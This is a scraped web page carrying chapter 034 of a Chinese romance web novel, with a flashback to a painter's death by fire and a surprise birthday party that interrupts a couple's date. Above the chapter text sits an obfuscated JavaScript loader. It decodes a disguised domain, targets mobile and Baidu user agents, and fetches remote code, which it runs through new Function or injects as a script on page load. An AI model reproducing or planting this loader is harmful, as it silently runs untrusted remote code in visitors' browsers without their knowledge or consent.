98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

034枝节(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('034枝节

“我喜欢能画出斑斓作品的叔叔,可是老师说有个很厉害的科学家得了ALS(渐冻症)就不能说话也不能画画了,叔叔也会那样吗?”

兰德消沉地自欺欺人:“不,我永远不会放下画笔。”

“那太好了。”尽管据她所知,兰德已经快一年没有新作了。

浓郁的草绿色液体漾开迷幻的味道,芳香的苦艾是这位风格独树一帜的艺术家,进入视觉盛宴的钥匙。

“叔叔你不能再碰absinthe(苦艾酒)。”

“哦对,我唯一的抚慰absinthe。”兰德笑意恍惚地敲了敲手中快见底的酒瓯,蓝色的眼里是疯狂的激进,“半年了!你知道吗?半年了!没了我的绿精灵我连一丁点儿灵感都没有!哪怕一丁点儿!”

晚栀将最后一点液体倒进酒杯,绽放真心的笑容:“那多喝点儿,Vincent不能再画伟大的作品实在是绘画这门艺术的损失。”

是,文森特·兰德因绘画而存在。

兰德凝视眼前笑容甜美的小女孩,第一次,那双纯真的眼眸终于专注地回视,让人心甘情愿喝下掺着蜜的毒药。

关于那句亘古的“To be or not to be”,隐约间兰德好像听到了答案。

ALS如同薛定谔的猫,但是没有打开箱子的必要了。

小女孩站在门口欣赏最后胜利的画面,火红的房间、失意醉酒的画家,多么鲜活的燃烧,艺术鬼才文森特·兰德最后一副作品的主题选择了他自己。

“在想什么?”正沉思的晚栀一激灵,避开脸颊的冰冷。

奚扬打开保温桶,馥郁的香味引人食指大动,晚栀瞥了一眼不为所动:“医生说可以不喝粥的。”

“也说这两天‘最好’喝粥。”

“前天说的,最后一餐我们可以变通一下。”

回答她的是嘴边无言的一勺粥,长而直的手指捏着勺子,仿佛最优质的手模广告图,她一定会买这套餐具,晚栀想。

灼灼光华,秀色可餐。

黑眸幽深看着食指关节多出的红色牙印,奚扬把粥放在旁边的桌上:“有这个力气我们可以做点别的。”

“那我可以出去走走吗?”感到抱歉的晚栀乖乖自己喝粥。

长腿抵着小桌倚在床头,他转头看窗外:“花园的鸢尾开了一点。”

“嘿……”知道他又在装聋作哑,相顾无言。

晚栀醒来没多久奚扬把她带到他家修养,对外都以为她还在加护病房,一时风声鹤唳,眼前这人好像比她这个当事人还紧张。

奚扬将她头发滑到耳后:“无聊?我叫白鹤小九他们来陪你,Cherry也好像回来了。”现在这情况,他们既然能在学校监察,薛茹柏灵这些湘南的朋友是见不了了。

他校外好像和周行止刘成蹊他们玩儿得不多,之前出去见的都是另一波朋友,好像关系挺好,叫的都是小名儿,白鹤和小九是和她聊得开心的两位。

“不用这么大费周章。”晚栀连忙摆手,最后挣扎着妥协,“看场电影?”

隔天奚扬就带她去了电影院,还仁慈地加了一碗豚骨拉面。

“如果能再加一份寿司就更好了。”

“如果你吃生的不会吐就好了。”

清澈的眼珠闪烁天真的侥幸:“也许不会?”

“我们来说说生花生的故事……”交握的双手骨节弄出警告的响声。

晚栀无力争辩极度倒霉的几率,她小时候进行过脱敏治疗,生花生只是偶尔过敏,汤圆内芯没熟更是偶然中的偶然,翻翻后面的菜单:“也有全熟寿司。”

“鳗鱼玉子你喜欢?”对面凉凉的嗓音实在让她不爽,但最后的结果确实如他所言,她合上菜单:“也好,省得吃饱了犯困。”煞有其事的样子引得冷脸破冰,奚扬抱她亲了好几口。

睡了一整场电影的主人翁挣扎坐正,无视对面调笑的眼神:“咳……那片尾曲挺好听的。”丛林法则类的厮杀她确实欣赏不来。她左顾右盼想转移话题:“开学几天了怎么还不见你去?”

“我不去了。”

“休学去美国?”

他点头:“你不用准备SAT?”

“其实我还没想好,不过这几天休息买了网课看。”幸好没点寿司,她想多了,一碗面都剩下大半。

奚扬皱眉:“就吃这么点?”

“我尽力了。”日餐分量不算多,浪费食物她也很郁闷,学着小时候卷起面送到对面的薄唇边,“帮帮忙。”

奚扬欣然接受那一口喂食,晚栀再接再厉:“送你一碗长寿面。”

服务员正好来送餐,奚扬顺势递过去:“送你一碗汤。”

临走晚栀觉得消化困难:“我好像有点积食。”

“走回去,反正不远。”奚扬拉着她的手慢悠悠。

晚栀哼着不成调的片尾曲,两人有一搭没一搭的闲聊,风很轻,路很短。

到门口的时候,晚栀摇晃两人十指紧扣的手:“这算不算……约会?”

奚扬他爱死那青涩的别扭,面上故作沉吟:“一半。”抱着纤细的身躯背抵门,长指慢慢在她后颈抚摸。

“嗯哼。”黑眸眼中流动熟悉的色彩,晚栀从善如流,听他鬼扯。

“男生带女生回家,然后……”低沉的嗓音消失在唇边,他用行动做出解答。

他们沉迷于彼此的气息,钥匙在缱绻的吻中打开门。

“Surprise!”

“Congratulations!”

“Happy birthday!”

各种祝福声和礼花炮响冲散两人正调情的气氛。

晚栀迅速清醒,努力自然地跟着祝福声:“Happy birthday.”可惜慢了一拍,在突然安静的空气中愈发尴尬。

寿星公僵硬地拉下头发上的彩带,冷淡地感谢:“Help yourself(请自便).”

从下午就开始布置的白鹤等人也是一阵尴尬,接下来是要怂恿CC献吻的,但是刚刚两人那热吻劲儿,这实在多余。

CC捏紧话筒,让她死心也至少确认一下。

熟稔女生这类心思的小九眼疾手快地拿过CC手里的话筒:“呃,今天装扮大厅太累了,晚上得好好嗨才行。”

正踌躇的众人一片应和,场面总算热络起来。

“这样不好吧。”晚栀拉住欲上楼的奚扬。

“没什么不好。”灯光一暗,变成斑斓混合照明,眉宇皱起的纹路更深了,“啧。”

“至少坐一下再上去?”走了许久的晚栀在沙发坐下,无力地喊住头也不回走远的奚扬,“嘿!”

“我需要去洗手间。”他交代了一句便穿过舞动的人群。

小九喊她坐到电视那边:“看来我们的Cool girl终于要崩盘了。”周围零星几人在拿着话筒唱后摇,让人放松不少。

“CC?”

“你怎么知道?”也对,那么明显,同为女生不难感觉到。小九朝她感叹:“我还是第一次见奚扬拉着人不放,那么……热情。”

晚栀捂脸:“对不起我不知道你们……”

小九是个爽朗的女孩儿:“我们也死脑筋,惊喜惊喜,只有惊。”

“嘿!好久不见。”白鹤从后头窜过来。

“嘿……”熟悉的旋律响起,似是万籁俱寂,话筒闲置在茶几上,轻柔的女声幽幽吟唱。

——

I remember tears streaming down your face

我记得泪水顺着你的脸颊流下

When I said, I&#039;ll never let you go

当我说我将永不放开你的手

When all those shadows almost killed your light

当所有的阴影几乎挡住了你的光亮

I remember you said, Don&#039;t leave me here alone

我记得你说过:“别把我一个人扔下。

But all that&#039;s dead and gone and passed tonight

但这一切都在今晚化作尘埃

……

“麻烦让一下。”来人红唇烟熏妆,亮片小裙勾勒着玲珑身姿,奚扬不耐地提醒。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间